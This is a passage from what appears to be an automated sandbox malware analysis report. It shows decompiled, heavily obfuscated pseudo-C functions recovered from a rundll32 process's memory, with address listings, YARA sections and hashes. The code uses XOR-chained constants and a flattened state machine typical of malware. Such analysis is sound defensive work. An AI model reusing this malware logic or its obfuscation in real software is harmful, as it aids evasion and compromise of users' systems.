				_v20 = _v20 ^ 0xc4737271;
				_v16 = 0xa8e87a;
				_v16 = _v16 + 0xffff799a;
				_t99 = 0x33;
				_v16 = _v16 / _t99;
				_v16 = _v16 ^ 0x000fed3f;
				_v28 = 0x7feeb5;
				_v28 = _v28 + 0xffffe4f6;
				_v28 = _v28 ^ 0x007d0c9c;
				_v32 = 0x59c916;
				_t100 = 0x5d;
				_v32 = _v32 / _t100;
				_v32 = _v32 ^ 0x000d1fec;
				_v12 = 0x866588;
				_v12 = _v12 ^ 0x68ade4cb;
				_v12 = _v12 + 0xffffbaa5;
				_v12 = _v12 ^ 0x68223e43;
				_v36 = 0xbafac2;
				_v36 = _v36 ^ 0x5e34b155;
				_v36 = _v36 ^ 0x5e8c811c;
				_v24 = 0xc770cb;
				_v24 = _v24 >> 0xf;
				_v24 = _v24 ^ 0x95635bf4;
				_v24 = _v24 ^ 0x956359d7;
				_v40 = 0xbd0b83;
				_v40 = _v40 >> 3;
				_v40 = _v40 ^ 0x001e2563;
				_t101 = _v8;
				if(E00698F15(_v8,  &_v576, _t100, _v20, _v16, _v28) != 0) {
					_t95 =  &_v576;
					if(_v576 != 0) {
						while( *_t95 != 0x5c) {
							_t95 = _t95 + 2;
							if( *_t95 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t101 = 0;
						 *((short*)(_t95 + 2)) = 0;
					}
					L6:
					E0069DB43(_t101,  &_v44, _t101, _v32, _t101,  &_v576, _t101, _v12, _t101, _v36, _v24, _v40);
				}
				return _v44;
			}




















                                                                                                                      0x0068ee8a
                                                                                                                      0x0068ee96
                                                                                                                      0x0068ee99
                                                                                                                      0x0068ee9c
                                                                                                                      0x0068ee9f
                                                                                                                      0x0068eea6
                                                                                                                      0x0068eead
                                                                                                                      0x0068eeb4
                                                                                                                      0x0068eebb
                                                                                                                      0x0068eec2
                                                                                                                      0x0068eec9
                                                                                                                      0x0068eed0
                                                                                                                      0x0068eed7
                                                                                                                      0x0068eede
                                                                                                                      0x0068eee5
                                                                                                                      0x0068eef1
                                                                                                                      0x0068eef6
                                                                                                                      0x0068eefb
                                                                                                                      0x0068ef02
                                                                                                                      0x0068ef09
                                                                                                                      0x0068ef10
                                                                                                                      0x0068ef17
                                                                                                                      0x0068ef21
                                                                                                                      0x0068ef2a
                                                                                                                      0x0068ef2d
                                                                                                                      0x0068ef34
                                                                                                                      0x0068ef3b
                                                                                                                      0x0068ef48
                                                                                                                      0x0068ef4f
                                                                                                                      0x0068ef56
                                                                                                                      0x0068ef5d
                                                                                                                      0x0068ef64
                                                                                                                      0x0068ef6b
                                                                                                                      0x0068ef72
                                                                                                                      0x0068ef76
                                                                                                                      0x0068ef7d
                                                                                                                      0x0068ef84
                                                                                                                      0x0068ef8b
                                                                                                                      0x0068ef8f
                                                                                                                      0x0068efa0
                                                                                                                      0x0068efad
                                                                                                                      0x0068efaf
                                                                                                                      0x0068efbc
                                                                                                                      0x0068efbe
                                                                                                                      0x0068efc4
                                                                                                                      0x0068efca
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068efcc
                                                                                                                      0x00000000
                                                                                                                      0x0068efca
                                                                                                                      0x0068efce
                                                                                                                      0x0068efd0
                                                                                                                      0x0068efd0
                                                                                                                      0x0068efd4
                                                                                                                      0x0068eff2
                                                                                                                      0x0068eff7
                                                                                                                      0x0068f001

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: C>"h$br8
                                                                                                                      • API String ID: 0-573140060
                                                                                                                      • Opcode ID: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                      • Instruction ID: ba7e9a554a5822a6a7f04a57e5e729b9e9206aee004b7f4d586669d8d4171b25
                                                                                                                      • Opcode Fuzzy Hash: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                      • Instruction Fuzzy Hash: 86410271C0021DEBCF58DFE4C94A5EEBBB5FB04304F20819AE505B6260E3B55A55CF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069AA30 Relevance: 2.6, Strings: 2, Instructions: 67COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0069AA30(signed int __edx, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t83;
				signed int _t85;
				signed int _t91;

				_v40 = _v40 & 0x00000000;
				_v48 = 0xea50c7;
				_v44 = 0x183406;
				_v8 = 0x4cb37c;
				_v8 = _v8 + 0xc736;
				_v8 = _v8 + 0xd4a7;
				_t91 = __edx;
				_t85 = 0x64;
				_v8 = _v8 * 0x2d;
				_v8 = _v8 ^ 0x0dcd94f9;
				_v24 = 0x238f3e;
				_v24 = _v24 << 3;
				_v24 = _v24 ^ 0x011b8be3;
				_v20 = 0x73abc8;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x00035013;
				_v16 = 0x5012b6;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 / _t85;
				_v16 = _v16 ^ 0x000aff4c;
				_v12 = 0x8c34bb;
				_v12 = _v12 | 0x8c5a3f77;
				_v12 = _v12 + 0xffff11fb;
				_v12 = _v12 ^ 0x2d4fbea1;
				_v12 = _v12 ^ 0xa19c1e56;
				_v36 = 0xff820a;
				_v36 = _v36 | 0x4fe4a4bc;
				_v36 = _v36 ^ 0x4ffdd4f4;
				_v32 = 0x36506a;
				_v32 = _v32 + 0x4de;
				_v32 = _v32 ^ 0x003709b9;
				_v28 = 0x64fd3b;
				_v28 = _v28 + 0xffff3e7a;
				_v28 = _v28 ^ 0x00656766;
				if( *((intOrPtr*)(0x6a3210 + __edx * 4)) == 0) {
					_t83 = E00690A0E(_t85, _t85, _a4);
					_push(_v28);
					_push(_a12);
					_push(_v32);
					_push(_t83);
					 *((intOrPtr*)(0x6a3210 + _t91 * 4)) = E0068CDCD(_v12, _v36);
				}
				return  *((intOrPtr*)(0x6a3210 + _t91 * 4));
			}

















                                                                                                                      0x0069aa36
                                                                                                                      0x0069aa3a
                                                                                                                      0x0069aa41
                                                                                                                      0x0069aa48
                                                                                                                      0x0069aa4f
                                                                                                                      0x0069aa56
                                                                                                                      0x0069aa62
                                                                                                                      0x0069aa68
                                                                                                                      0x0069aa69
                                                                                                                      0x0069aa6c
                                                                                                                      0x0069aa73
                                                                                                                      0x0069aa7a
                                                                                                                      0x0069aa7e
                                                                                                                      0x0069aa85
                                                                                                                      0x0069aa8c
                                                                                                                      0x0069aa90
                                                                                                                      0x0069aa97
                                                                                                                      0x0069aa9e
                                                                                                                      0x0069aaa7
                                                                                                                      0x0069aaaa
                                                                                                                      0x0069aab1
                                                                                                                      0x0069aab8
                                                                                                                      0x0069aabf
                                                                                                                      0x0069aac6
                                                                                                                      0x0069aacd
                                                                                                                      0x0069aad4
                                                                                                                      0x0069aadb
                                                                                                                      0x0069aae2
                                                                                                                      0x0069aae9
                                                                                                                      0x0069aaf0
                                                                                                                      0x0069aaf7
                                                                                                                      0x0069aafe
                                                                                                                      0x0069ab05
                                                                                                                      0x0069ab0c
                                                                                                                      0x0069ab1b
                                                                                                                      0x0069ab2e
                                                                                                                      0x0069ab33
                                                                                                                      0x0069ab36
                                                                                                                      0x0069ab39
                                                                                                                      0x0069ab42
                                                                                                                      0x0069ab4b
                                                                                                                      0x0069ab4b
                                                                                                                      0x0069ab5d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: fge$jP6
                                                                                                                      • API String ID: 0-775479084
                                                                                                                      • Opcode ID: 9c5b6e836d6eed5fb25385116631fb4f12066803a54c304e3c7bbec5116019c9
                                                                                                                      • Instruction ID: e2bdab16d6c067fd5ef1a3bb6d4021dcb5b45026d1ef7fd5f01928a8d6c36dd9
                                                                                                                      • Opcode Fuzzy Hash: 9c5b6e836d6eed5fb25385116631fb4f12066803a54c304e3c7bbec5116019c9
                                                                                                                      • Instruction Fuzzy Hash: B031EEB1C00209EBCF48DFA4CA4A9EEBBB5FB09318F108148E511B6220C3B95B49CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 006A0E3A Relevance: 2.6, Strings: 2, Instructions: 61COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E006A0E3A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t61;
				intOrPtr _t66;
				void* _t73;
				intOrPtr* _t74;

				_t74 = _a16;
				_push(_t74);
				_push(_a12);
				_t73 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006920B9(_t61);
				_v16 = 0x2b4f5d;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000abada;
				_v24 = 0x6f176d;
				_v24 = _v24 | 0x8892b5fd;
				_v24 = _v24 ^ 0x88fd6dba;
				_v12 = 0x9049ef;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x7aa47b64;
				_v12 = _v12 ^ 0x7aa68413;
				_a16 = 0x9c064;
				_a16 = _a16 + 0x4e6a;
				_a16 = _a16 + 0xffffd44e;
				_a16 = _a16 | 0x475ceb65;
				_a16 = _a16 ^ 0x47532e3d;
				_v8 = 0xaf6c6f;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0xad29;
				_v8 = _v8 + 0xd52;
				_v8 = _v8 ^ 0x000b7d9e;
				_v20 = 0xd79f7b;
				_v20 = _v20 ^ 0x214a9efd;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x010f9d8f;
				E00690DAF(_v16, __ecx, _v24,  *((intOrPtr*)(_t74 + 4)), _v12, _a16);
				E0068ED7E(_v8,  *((intOrPtr*)(__ecx + 0x24)), _v20,  *_t74,  *((intOrPtr*)(_t74 + 4)));
				_t66 =  *((intOrPtr*)(_t74 + 4));
				 *((intOrPtr*)(_t73 + 0x24)) =  *((intOrPtr*)(_t73 + 0x24)) + _t66;
				return _t66;
			}












                                                                                                                      0x006a0e41
                                                                                                                      0x006a0e45
                                                                                                                      0x006a0e46
                                                                                                                      0x006a0e49
                                                                                                                      0x006a0e4b
                                                                                                                      0x006a0e4e
                                                                                                                      0x006a0e52
                                                                                                                      0x006a0e53
                                                                                                                      0x006a0e58
                                                                                                                      0x006a0e65
                                                                                                                      0x006a0e68
                                                                                                                      0x006a0e6c
                                                                                                                      0x006a0e73
                                                                                                                      0x006a0e7a
                                                                                                                      0x006a0e81
                                                                                                                      0x006a0e88
                                                                                                                      0x006a0e8f
                                                                                                                      0x006a0e93
                                                                                                                      0x006a0e9a
                                                                                                                      0x006a0ea1
                                                                                                                      0x006a0ea8
                                                                                                                      0x006a0eaf
                                                                                                                      0x006a0eb6
                                                                                                                      0x006a0ebd
                                                                                                                      0x006a0ec4
                                                                                                                      0x006a0ecb
                                                                                                                      0x006a0ecf
                                                                                                                      0x006a0ed6
                                                                                                                      0x006a0edd
                                                                                                                      0x006a0ee4
                                                                                                                      0x006a0eeb
                                                                                                                      0x006a0ef2
                                                                                                                      0x006a0ef6
                                                                                                                      0x006a0f0c
                                                                                                                      0x006a0f1f
                                                                                                                      0x006a0f24
                                                                                                                      0x006a0f2a
                                                                                                                      0x006a0f32

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: =.SG$]O+
                                                                                                                      • API String ID: 0-348654084
                                                                                                                      • Opcode ID: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                      • Instruction ID: 78276b60f766109228535e6b6a24794e4aecfb7c8d19227125405f86f5181667
                                                                                                                      • Opcode Fuzzy Hash: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                      • Instruction Fuzzy Hash: 4921257180120DEFCF45DFE4DA4A8AEBBB1FF45304F208599E92562625C3B19B24DFA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001CD16 Relevance: 1.9, APIs: 1, Instructions: 445COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 431132790-0
                                                                                                                      • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                      • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                      • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                      • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069044F Relevance: 1.5, Strings: 1, Instructions: 287COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E0069044F() {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t309;
				intOrPtr _t310;
				void* _t311;
				intOrPtr _t321;
				intOrPtr _t325;
				void* _t329;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr _t369;
				void* _t373;
				intOrPtr _t374;
				void* _t379;
				signed int* _t383;

				_t383 =  &_v140;
				_v16 = 0x8f0e94;
				_v12 = 0x9bdfd3;
				_t329 = 0;
				_v8 = _v8 & 0;
				_v4 = _v4 & 0;
				_v68 = 0xf0a33d;
				_v68 = _v68 ^ 0x64690d06;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x00c9335c;
				_v96 = 0x45a6c;
				_v96 = _v96 + 0xffff2947;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 ^ 0x00000003;
				_v56 = 0xab09eb;
				_v56 = _v56 | 0x7e070137;
				_v56 = _v56 ^ 0x7eaf09ff;
				_v80 = 0xa0f766;
				_v80 = _v80 | 0xafeefcb7;
				_v80 = _v80 ^ 0xafeefff7;
				_v48 = 0xf26de0;
				_v48 = _v48 + 0xffff1ff1;
				_v48 = _v48 ^ 0x00f18dd1;
				_v76 = 0x20d89d;
				_v76 = _v76 + 0xffff51c8;
				_v76 = _v76 | 0xd50d8457;
				_v76 = _v76 ^ 0xd52cfd33;
				_v136 = 0x1fce72;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 | 0xd51e44d2;
				_t331 = 7;
				_v136 = _v136 / _t331;
				_v136 = _v136 ^ 0x1e7b1fff;
				_t379 = 0x1e2498b;
				_v92 = 0x2fa0bb;
				_v92 = _v92 >> 7;
				_v92 = _v92 << 1;
				_v92 = _v92 ^ 0x0000a534;
				_v52 = 0x3913b;
				_t332 = 0x4f;
				_v52 = _v52 / _t332;
				_v52 = _v52 ^ 0x00068b65;
				_v104 = 0xfffd78;
				_v104 = _v104 | 0x3b05e9e1;
				_v104 = _v104 + 0x741e;
				_v104 = _v104 ^ 0x7591a7da;
				_v104 = _v104 ^ 0x4990882f;
				_v84 = 0xe3d15a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0xbeb387df;
				_v84 = _v84 ^ 0x5d62ae1e;
				_v24 = 0xb3d42d;
				_v24 = _v24 | 0x6ee5a57e;
				_v24 = _v24 ^ 0x6efe8c67;
				_v60 = 0x6708ad;
				_v60 = _v60 + 0xd3fd;
				_v60 = _v60 ^ 0x0061923e;
				_v128 = 0x5551d4;
				_t333 = 0x50;
				_v128 = _v128 / _t333;
				_t334 = 0x7a;
				_v128 = _v128 / _t334;
				_t335 = 0x7e;
				_v128 = _v128 * 0x46;
				_v128 = _v128 ^ 0x000c63e9;
				_v28 = 0xd668f8;
				_v28 = _v28 << 0x10;
				_v28 = _v28 ^ 0x68f34519;
				_v112 = 0x194a18;
				_v112 = _v112 / _t335;
				_v112 = _v112 | 0xa7c33fbe;
				_t336 = 0x65;
				_v112 = _v112 / _t336;
				_v112 = _v112 ^ 0x01a285cf;
				_v44 = 0xc79794;
				_v44 = _v44 ^ 0x35aba003;
				_v44 = _v44 ^ 0x356e5b19;
				_v140 = 0x380362;
				_t337 = 0x79;
				_v140 = _v140 * 5;
				_v140 = _v140 ^ 0x1d7b2daf;
				_v140 = _v140 + 0x590f;
				_v140 = _v140 ^ 0x1c6cd8ab;
				_v120 = 0x1c8328;
				_v120 = _v120 / _t337;
				_t338 = 0xa;
				_v120 = _v120 / _t338;
				_v120 = _v120 | 0x9d020d0f;
				_v120 = _v120 ^ 0x9d02076d;
				_v124 = 0x55cbd6;
				_v124 = _v124 >> 9;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 >> 6;
				_v124 = _v124 ^ 0x000fb83a;
				_v132 = 0xf0ac8c;
				_v132 = _v132 | 0x3804c269;
				_v132 = _v132 >> 1;
				_v132 = _v132 + 0xffff8da8;
				_v132 = _v132 ^ 0x1c781e64;
				_v88 = 0x7992e8;
				_v88 = _v88 | 0xba3027fa;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x0051fda0;
				_v36 = 0x7aefbd;
				_v36 = _v36 + 0xfffff4eb;
				_v36 = _v36 ^ 0x0078a7fc;
				_v40 = 0xf56b46;
				_v40 = _v40 + 0xffff9ce0;
				_v40 = _v40 ^ 0x00fe48d4;
				_v108 = 0x27569f;
				_v108 = _v108 + 0x2c0a;
				_v108 = _v108 ^ 0xb442ac8c;
				_v108 = _v108 ^ 0xdc856b2a;
				_v108 = _v108 ^ 0x68e3c0da;
				_v116 = 0xbcba21;
				_v116 = _v116 << 0xd;
				_v116 = _v116 << 8;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x011b605a;
				_v32 = 0x87c31e;
				_v32 = _v32 ^ 0x05bc26b1;
				_v32 = _v32 ^ 0x05363b16;
				_v100 = 0x4be1cd;
				_v100 = _v100 + 0xffff13dd;
				_v100 = _v100 | 0xdbf19b4f;
				_v100 = _v100 >> 7;
				_v100 = _v100 ^ 0x01b90151;
				_v64 = 0xb1223e;
				_v64 = _v64 | 0xb1fef6fe;
				_v64 = _v64 ^ 0xb1f65c82;
				_v72 = 0x9ef2a7;
				_v72 = _v72 * 0x66;
				_v72 = _v72 + 0xffffefd1;
				_v72 = _v72 ^ 0x3f51caaf;
				while(1) {
					L1:
					while(1) {
						_t309 = 0x546d98;
						do {
							L3:
							if(_t379 == _t309) {
								_t310 =  *0x6a3e00; // 0x0
								_t339 = _v56;
								_t311 = E00690DD6(_t339, _v124, _v132, _v20,  *((intOrPtr*)(_t310 + 0x14)),  *((intOrPtr*)(_t310 + 0x10)), _v88, _v36);
								_t383 =  &(_t383[6]);
								__eflags = _t311 - _v80;
								if(__eflags != 0) {
									_t379 = 0x64eb485;
									goto L14;
								} else {
									_t379 = 0xb6ab68a;
									_t329 = 1;
									goto L1;
								}
							} else {
								if(_t379 == 0x19763e8) {
									_push(_v128);
									_push(_v60);
									__eflags = E00689462(E0069DCF7(_v24, 0x6817f8, __eflags), _v112,  &_v20, 0, _v44, _v68) - _v96;
									_t339 = _v140;
									_t379 =  ==  ? 0x546d98 : 0x64eb485;
									E0068A8B0(_t339, _t313, _v120);
									_t383 =  &(_t383[8]);
									L14:
									_t369 =  *0x6a3e00; // 0x0
									_t309 = 0x546d98;
									goto L15;
								} else {
									if(_t379 == 0x1e2498b) {
										_push(_t339);
										_push(_t339);
										_t373 = 0x28;
										_t321 = E00687FF2(_t373);
										 *0x6a3e00 = _t321;
										 *((intOrPtr*)(_t321 + 0x14)) = 0x4000;
										_t374 =  *0x6a3e00; // 0x0
										_t325 = E00687FF2( *((intOrPtr*)(_t374 + 0x14)));
										_t369 =  *0x6a3e00; // 0x0
										_t379 = 0x19763e8;
										_t339 =  *((intOrPtr*)(_t369 + 0x14)) + _t325;
										 *((intOrPtr*)(_t369 + 0x10)) = _t325;
										 *((intOrPtr*)(_t369 + 0x1c)) = _t325;
										 *((intOrPtr*)(_t369 + 0x24)) = _t325;
										 *(_t369 + 4) = _t339;
										_t309 = 0x546d98;
										continue;
									} else {
										if(_t379 == 0x64eb485) {
											E00698519(_v32, _v100,  *((intOrPtr*)(_t369 + 0x10)));
											E00698519(_v64, _v72,  *0x6a3e00);
										} else {
											if(_t379 != 0xb6ab68a) {
												goto L15;
											} else {
												E0068957D(_v20, _v40, _v108, _v48, _v116);
											}
										}
									}
								}
							}
							L18:
							return _t329;
							L15:
							__eflags = _t379 - 0xfde45c5;
						} while (__eflags != 0);
						goto L18;
					}
				}
			}


























































                                                                                                                      0x0069044f
                                                                                                                      0x00690459
                                                                                                                      0x00690466
                                                                                                                      0x00690471
                                                                                                                      0x00690473
                                                                                                                      0x0069047a
                                                                                                                      0x00690481
                                                                                                                      0x00690489
                                                                                                                      0x00690491
                                                                                                                      0x00690496
                                                                                                                      0x0069049e
                                                                                                                      0x006904a6
                                                                                                                      0x006904ae
                                                                                                                      0x006904b3
                                                                                                                      0x006904b8
                                                                                                                      0x006904c0
                                                                                                                      0x006904c8
                                                                                                                      0x006904d0
                                                                                                                      0x006904d8
                                                                                                                      0x006904e0
                                                                                                                      0x006904e8
                                                                                                                      0x006904f0
                                                                                                                      0x006904f8
                                                                                                                      0x00690500
                                                                                                                      0x00690508
                                                                                                                      0x00690510
                                                                                                                      0x00690518
                                                                                                                      0x00690520
                                                                                                                      0x00690528
                                                                                                                      0x0069052d
                                                                                                                      0x0069053b
                                                                                                                      0x00690540
                                                                                                                      0x00690546
                                                                                                                      0x0069054e
                                                                                                                      0x00690553
                                                                                                                      0x0069055b
                                                                                                                      0x00690560
                                                                                                                      0x00690564
                                                                                                                      0x0069056c
                                                                                                                      0x00690578
                                                                                                                      0x0069057d
                                                                                                                      0x00690583
                                                                                                                      0x0069058b
                                                                                                                      0x00690593
                                                                                                                      0x0069059b
                                                                                                                      0x006905a3
                                                                                                                      0x006905ab
                                                                                                                      0x006905b3
                                                                                                                      0x006905bb
                                                                                                                      0x006905c0
                                                                                                                      0x006905c8
                                                                                                                      0x006905d0
                                                                                                                      0x006905db
                                                                                                                      0x006905e6
                                                                                                                      0x006905f1
                                                                                                                      0x006905f9
                                                                                                                      0x00690601
                                                                                                                      0x00690609
                                                                                                                      0x00690615
                                                                                                                      0x0069061a
                                                                                                                      0x00690624
                                                                                                                      0x00690627
                                                                                                                      0x00690634
                                                                                                                      0x00690637
                                                                                                                      0x0069063b
                                                                                                                      0x00690643
                                                                                                                      0x0069064e
                                                                                                                      0x00690656
                                                                                                                      0x00690661
                                                                                                                      0x00690671
                                                                                                                      0x00690675
                                                                                                                      0x00690681
                                                                                                                      0x00690686
                                                                                                                      0x0069068c
                                                                                                                      0x00690694
                                                                                                                      0x0069069c
                                                                                                                      0x006906a4
                                                                                                                      0x006906ac
                                                                                                                      0x006906b9
                                                                                                                      0x006906bc
                                                                                                                      0x006906c0
                                                                                                                      0x006906c8
                                                                                                                      0x006906d0
                                                                                                                      0x006906d8
                                                                                                                      0x006906e8
                                                                                                                      0x006906f0
                                                                                                                      0x006906f3
                                                                                                                      0x006906f7
                                                                                                                      0x006906ff
                                                                                                                      0x00690707
                                                                                                                      0x0069070f
                                                                                                                      0x00690714
                                                                                                                      0x00690719
                                                                                                                      0x0069071e
                                                                                                                      0x00690726
                                                                                                                      0x0069072e
                                                                                                                      0x00690736
                                                                                                                      0x0069073a
                                                                                                                      0x00690742
                                                                                                                      0x0069074a
                                                                                                                      0x00690752
                                                                                                                      0x0069075a
                                                                                                                      0x0069075f
                                                                                                                      0x00690767
                                                                                                                      0x0069076f
                                                                                                                      0x00690777
                                                                                                                      0x0069077f
                                                                                                                      0x00690787
                                                                                                                      0x0069078f
                                                                                                                      0x00690797
                                                                                                                      0x0069079f
                                                                                                                      0x006907a7
                                                                                                                      0x006907af
                                                                                                                      0x006907b7
                                                                                                                      0x006907bf
                                                                                                                      0x006907c7
                                                                                                                      0x006907cc
                                                                                                                      0x006907d1
                                                                                                                      0x006907d6
                                                                                                                      0x006907de
                                                                                                                      0x006907e6
                                                                                                                      0x006907ee
                                                                                                                      0x006907f6
                                                                                                                      0x006907fe
                                                                                                                      0x00690806
                                                                                                                      0x0069080e
                                                                                                                      0x00690818
                                                                                                                      0x00690820
                                                                                                                      0x00690828
                                                                                                                      0x00690830
                                                                                                                      0x00690838
                                                                                                                      0x00690845
                                                                                                                      0x00690849
                                                                                                                      0x00690851
                                                                                                                      0x00690859
                                                                                                                      0x00690859
                                                                                                                      0x0069085f
                                                                                                                      0x0069085f
                                                                                                                      0x00690864
                                                                                                                      0x00690864
                                                                                                                      0x00690866
                                                                                                                      0x00690985
                                                                                                                      0x0069099f
                                                                                                                      0x006909a3
                                                                                                                      0x006909a8
                                                                                                                      0x006909ab
                                                                                                                      0x006909af
                                                                                                                      0x006909be
                                                                                                                      0x00000000
                                                                                                                      0x006909b1
                                                                                                                      0x006909b3
                                                                                                                      0x006909b8
                                                                                                                      0x00000000
                                                                                                                      0x006909b8
                                                                                                                      0x0069086c
                                                                                                                      0x00690872
                                                                                                                      0x0069091a
                                                                                                                      0x00690923
                                                                                                                      0x00690963
                                                                                                                      0x00690967
                                                                                                                      0x00690970
                                                                                                                      0x00690973
                                                                                                                      0x00690978
                                                                                                                      0x006909c0
                                                                                                                      0x006909c0
                                                                                                                      0x006909c6
                                                                                                                      0x00000000
                                                                                                                      0x00690878
                                                                                                                      0x0069087e
                                                                                                                      0x006908c7
                                                                                                                      0x006908c8
                                                                                                                      0x006908cb
                                                                                                                      0x006908cc
                                                                                                                      0x006908d1
                                                                                                                      0x006908d6
                                                                                                                      0x006908e9
                                                                                                                      0x006908f2
                                                                                                                      0x006908f7
                                                                                                                      0x006908fd
                                                                                                                      0x00690907
                                                                                                                      0x00690909
                                                                                                                      0x0069090c
                                                                                                                      0x0069090f
                                                                                                                      0x00690912
                                                                                                                      0x0069085f
                                                                                                                      0x00000000
                                                                                                                      0x00690880
                                                                                                                      0x00690882
                                                                                                                      0x006909e7
                                                                                                                      0x006909fa
